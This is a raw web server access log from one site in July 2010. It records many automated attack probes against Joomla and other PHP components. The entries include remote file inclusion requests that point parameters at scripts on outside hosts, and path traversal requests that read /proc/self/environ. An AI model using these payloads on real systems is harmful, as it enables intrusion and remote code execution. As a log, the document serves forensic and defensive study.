110.45.147.240 - - [27/Jul/2010:05:37:11 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.45.147.240 - - [27/Jul/2010:05:37:11 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.45.147.240 - - [27/Jul/2010:05:37:11 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [27/Jul/2010:05:37:50 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [27/Jul/2010:05:37:50 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [27/Jul/2010:05:37:50 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.65.2.151 - - [27/Jul/2010:05:38:24 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
217.65.2.151 - - [27/Jul/2010:05:38:24 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
217.65.2.151 - - [27/Jul/2010:05:38:24 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "redneckmba.com"
217.65.2.151 - - [27/Jul/2010:05:38:25 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "redneckmba.com"
65.13.185.104 - - [27/Jul/2010:05:58:53 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
65.13.185.104 - - [27/Jul/2010:05:59:04 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.65.2.151 - - [27/Jul/2010:06:01:26 -0700] "GET /logs/access.log/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
217.65.2.151 - - [27/Jul/2010:06:01:26 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
217.65.2.151 - - [27/Jul/2010:06:01:27 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:06:12:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.213.8 - - [27/Jul/2010:06:13:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
122.155.9.169 - - [27/Jul/2010:06:18:08 -0700] "GET /export.php?mosConfig_absolute_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.9.169 - - [27/Jul/2010:06:18:13 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:06:18:58 -0700] "GET /logs/access.log/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:06:18:58 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:06:18:59 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:06:21:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [27/Jul/2010:06:23:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
114.108.151.149 - - [27/Jul/2010:06:29:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
188.165.213.8 - - [27/Jul/2010:06:34:35 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [27/Jul/2010:06:34:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [27/Jul/2010:06:34:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:06:39:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.155.9.169 - - [27/Jul/2010:06:50:46 -0700] "GET /shop_this_skin_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.9.169 - - [27/Jul/2010:06:50:48 -0700] "GET /logs/shop_this_skin_path=http://qwez.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:06:52:17 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:06:52:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:06:52:17 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.46.199.191 - - [27/Jul/2010:06:52:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
114.108.151.149 - - [27/Jul/2010:06:55:33 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:06:55:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:06:55:34 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
216.129.119.47 - - [27/Jul/2010:06:56:16 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
76.13.114.105 - - [27/Jul/2010:06:56:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.27.11.149 - - [27/Jul/2010:07:03:48 -0700] "GET /logs/access.log HTTP/1.1" 200 307853 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
202.125.152.246 - - [27/Jul/2010:07:05:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.125.152.246 - - [27/Jul/2010:07:05:01 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.125.152.246 - - [27/Jul/2010:07:05:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.214.46.25 - - [27/Jul/2010:07:05:29 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.redneckmba.com"
91.214.46.25 - - [27/Jul/2010:07:05:18 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.redneckmba.com"
67.195.114.41 - - [27/Jul/2010:07:07:52 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.114.41 - - [27/Jul/2010:07:07:52 -0700] "GET /logs/?M=D HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
65.13.185.104 - - [27/Jul/2010:07:15:26 -0700] "GET /logs/access.log/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
65.13.185.104 - - [27/Jul/2010:07:15:29 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
65.13.185.104 - - [27/Jul/2010:07:15:32 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:07:15:50 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:07:15:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:07:15:50 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:07:17:26 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
114.108.151.149 - - [27/Jul/2010:07:18:35 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:07:18:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:07:18:37 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.249.65.43 - - [27/Jul/2010:07:18:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:07:22:46 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://snsecrets.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:07:22:46 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://snsecrets.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:07:22:46 -0700] "GET /logs/access.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://snsecrets.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.196 - - [27/Jul/2010:07:23:31 -0700] "GET /logs/access.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.196 - - [27/Jul/2010:07:23:36 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.206.120.196 - - [27/Jul/2010:07:23:36 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:07:25:21 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://snsecrets.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:07:26:11 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.73 - - [27/Jul/2010:07:26:53 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.73 - - [27/Jul/2010:07:26:54 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.73 - - [27/Jul/2010:07:26:54 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:07:27:15 -0700] "GET /_inc/config.php?rootBase=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:07:27:15 -0700] "GET /logs//_inc/config.php?rootBase=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:07:27:15 -0700] "GET /logs/access.log%20%20//_inc/config.php?rootBase=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:07:27:23 -0700] "GET /logs//_inc/config.php?rootBase=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:07:27:23 -0700] "GET /logs/access.log%20%20//_inc/config.php?rootBase=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:07:27:23 -0700] "GET /_inc/config.php?rootBase=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:30:20 -0700] "GET /logs/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:30:20 -0700] "GET /com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:30:45 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:30:45 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "redneckmba.com"
114.108.151.149 - - [27/Jul/2010:07:30:51 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:07:30:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.108.151.149 - - [27/Jul/2010:07:30:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:31:55 -0700] "GET /com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:32:38 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
211.238.14.22 - - [27/Jul/2010:07:34:09 -0700] "GET //?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [27/Jul/2010:07:34:09 -0700] "GET /logs///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [27/Jul/2010:07:34:09 -0700] "GET /logs/access.log%20%20///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:37:55 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:37:55 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:38:11 -0700] "GET /logs/access.log/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:38:11 -0700] "GET /com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:38:11 -0700] "GET /logs/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:38:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:38:59 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:38:59 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:38:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:38:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:40:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:40:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
202.70.136.22 - - [27/Jul/2010:07:40:23 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.70.136.22 - - [27/Jul/2010:07:40:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:40:38 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:07:40:38 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:41:10 -0700] "GET /logs/access.log/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:41:10 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
213.215.178.34 - - [27/Jul/2010:07:41:11 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.inversaludcr.com/sys/.logs/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
202.70.136.22 - - [27/Jul/2010:07:41:23 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:41:51 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:41:51 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:41:52 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:41:57 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:07:41:57 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.matchmaking.at/iknow09/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
